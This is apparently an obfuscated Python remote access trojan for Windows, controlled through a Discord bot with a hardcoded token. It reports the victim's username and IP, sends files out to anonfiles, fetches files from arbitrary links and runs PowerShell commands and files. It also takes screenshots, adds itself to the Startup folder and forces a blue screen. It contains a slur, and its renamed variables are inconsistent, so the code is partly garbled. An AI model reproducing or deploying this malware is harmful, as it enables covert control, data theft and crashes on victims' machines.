import os,discord,subprocess,requests,pyautogui,ctypes,sys
Ş”=open
ğ¹‹=int
ğ¤œ¼=True
ğ¬–»=False
ğ³¯=file
æ£²=sys.argv
í‘¯=ctypes.byref
ğ¦£¹=ctypes.c_ulong
ğ—†­=ctypes.c_bool
ğ£ª=ctypes.windll
à­±=pyautogui.screenshot
ğ¬“š=requests.post
ğ«†ª=requests.get
ğ¡¬=subprocess.PIPE
ğ¬=subprocess.Popen
ï­º=discord.File
ì¦´=discord.Embed
ï´€=discord.Intents
ğ£¨Ÿ=discord.Client
ğ¢€¬=os.path
ï´¹=os.listdir
çº‡=os.chdir
ç¹‹=os.getenv
ïµ¼=os.urandom
ğ¬=os.getlogin
from dotenv import load_dotenv
load_dotenv()
ä›‡=ğ¬()
ğ”ˆ=ğ£¨Ÿ(intents=ï´€.all())
ã“=ïµ¼(8).hex()
ğ¹™="1396104834901348413"
ğ«²¶="MTM5OTY4NTAzNzQ5Mzg1MDI1Mg.G5SMBB.sS4C-b6aOTXJ-gtoCZVYgYVYrYTE4yQ8afZCkw"
ğ ="\n".join(["help - Help Command","ping - Ping Command","cd - Change Directory","ls - List Directory","download <file> - Download File","upload <link> - Upload File","cmd - Execute CMD Command","run <file> - Run an File","screenshot - Take a Screenshot","blue - DeadScreen","startup - Add To Startup","exit - Exit The Session"])
def ğ¤³(file_path=""):
 ğ’€=ç¹‹("TEMP")
 ïº­=r'C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'%ä›‡
 if file_path=="":
  file_path=æ£²[0]
 with Ş”(ïº­+'\\'+"Update.bat","w+")as ğ¨¦—:
  ğ¨¦—.write(r'start "" "%s"'%file_path)
@ğ”ˆ.event
async def å´—():
 ï³†=ğ”ˆ.get_guild(ğ¹‹(ğ¹™))
 ğ¡“=await ï³†.create_text_channel(ã“)
 è°™=ğ«†ª("https://ipapi.co/json/").json()
 ğ¡‚=è°™['country_name'],è°™['ip']
 ğ´‡=ì¦´(title="New session created",description="",color=0xfafafa)
 ğ´‡.add_field(name="Session ID",value=f"```{session_id}```",inline=ğ¤œ¼)
 ğ´‡.add_field(name="Username",value=f"```{os.getlogin()}```",inline=ğ¤œ¼)
 ğ´‡.add_field(name="IP Address",value=f"```{data}```",inline=ğ¤œ¼)
 ğ´‡.add_field(name="Commands",value=f"```{commands}```",inline=ğ¬–»)
 await ğ¡“.send(embed=ğ´‡)
@ğ”ˆ.event
async def à „(ğ¬Œ):
 if ğ¬Œ.author==ğ”ˆ.user:
  return
 if ğ¬Œ.channel.name!=ã“:
  return
 if ğ¬Œ.content=="help":
  ğ´‡=ì¦´(title="Help",description=f"```{commands}```",color=0xfafafa)
  await ğ¬Œ.reply(embed=ğ´‡)
 if ğ¬Œ.content=="ping":
  ğ´‡=ì¦´(title="Ping",description=f"```{round(client.latency * 1000)}ms```",color=0xfafafa)
  await ğ¬Œ.reply(embed=ğ´‡)
 if ğ¬Œ.content.startswith("cd"):
  æ¬±=ğ¬Œ.content.split(" ")[1]
  try:
   çº‡(æ¬±)
   ğ´‡=ì¦´(title="Changed Directory",description=f"```{os.getcwd()}```",color=0xfafafa)
  except:
   ğ´‡=ì¦´(title="Error",description=f"```Directory Not Found```",color=0xfafafa)
  await ğ¬Œ.reply(embed=ğ´‡)
 if ğ¬Œ.content=="ls":
  ğ’“‚="\n".join(ï´¹())
  if ğ’“‚=="":
   ğ’“‚="No Files Found"
  ğ´‡=ì¦´(title=f"Files > {os.getcwd()}",description=f"```{files}```",color=0xfafafa)
  await ğ¬Œ.reply(embed=ğ´‡)
 if ğ¬Œ.content.startswith("download"):
  ğ³¯=ğ¬Œ.content.split(" ")[1]
  try:
   ğ¢«=ğ¬“š("https://api.anonfiles.com/upload",files={"file":Ş”(ğ³¯,"rb")}).json()["data"]["file"]["url"]["full"]
   ğ´‡=ì¦´(title="Download",description=f"```{link}```",color=0xfafafa)
   await ğ¬Œ.reply(embed=ğ´‡)
  except:
   ğ´‡=ì¦´(title="Error",description=f"```File Not Found```",color=0xfafafa)
   await ğ¬Œ.reply(embed=ğ´‡)
 if ğ¬Œ.content.startswith("upload"):
  ğ¢«=ğ¬Œ.content.split(" ")[1]
  ğ³¯=ğ«†ª(ğ¢«).content
  with Ş”(ğ¢€¬.basename(ğ¢«),"wb")as ë±:
   ë±.write(ğ³¯)
  ğ´‡=ì¦´(title="Upload",description=f"```{os.path.basename(link)}```",color=0xfafafa)
  await ğ¬Œ.reply(embed=ğ´‡)
 if ğ¬Œ.content.startswith("shell"):
  ğ£=ğ¬Œ.content.split(" ",1)[1]
  ğ´š=ğ¬(["powershell.exe",ğ£],stdout=ğ¡¬,stderr=ğ¡¬,stdin=ğ¡¬).communicate()[0].decode("utf-8")
  if ğ´š=="":
   ğ´š="No output"
  ğ´‡=ì¦´(title=f"Shell > {os.getcwd()}",description=f"```{output}```",color=0xfafafa)
  await ğ¬Œ.reply(embed=ğ´‡)
 if ğ¬Œ.content.startswith("run"):
  ğ³¯=ğ¬Œ.content.split(" ")[1]
  ğ¬(ğ³¯,shell=ğ¤œ¼)
  ğ´‡=ì¦´(title="Started",description=f"```{file}```",color=0xfafafa)
  await ğ¬Œ.reply(embed=ğ´‡)
 if ğ¬Œ.content.startswith("exit"):
  await ğ¬Œ.channel.delete()
  await ğ”ˆ.close()
 if ğ¬Œ.content.startswith("startup"):
  await ğ¬Œ.reply("Ok lil Nigga")
  ğ¤³()
 if ğ¬Œ.content.startswith("blue"):
  await ğ¬Œ.reply("Attempting...",delete_after=0.1)
  ğ¡…=ğ£ª.ntdll
  ğª©¾=ğ—†­()
  ğ£ª=ğ¦£¹()
  ğ¡….RtlAdjustPrivilege(19,ğ¤œ¼,ğ¬–»,í‘¯(ğª©¾))
  if not ğ¡….NtRaiseHardError(0xDEADDEAD,0,0,0,6,í‘¯(ğ£ª)):
   await ğ¬Œ.reply("Blue Successful!")
  else:
   await ğ¬Œ.reply("Blue Failed! :(")
 if ğ¬Œ.content.startswith("screenshot"):
  ğ­½¦=à­±()
  ï±™=ğ¢€¬.join(ç¹‹("TEMP"),"screenshot.png")
  ğ­½¦.save(ï±™)
  ğ³¯=ï­º(ï±™)
  ğ´‡=ì¦´(title="Screenshot",color=0xfafafa)
  ğ´‡.set_image(url="attachment://screenshot.png")
  await ğ¬Œ.reply(embed=ğ´‡,ğ³¯=ğ³¯)
ğ”ˆ.run(ğ«²¶)
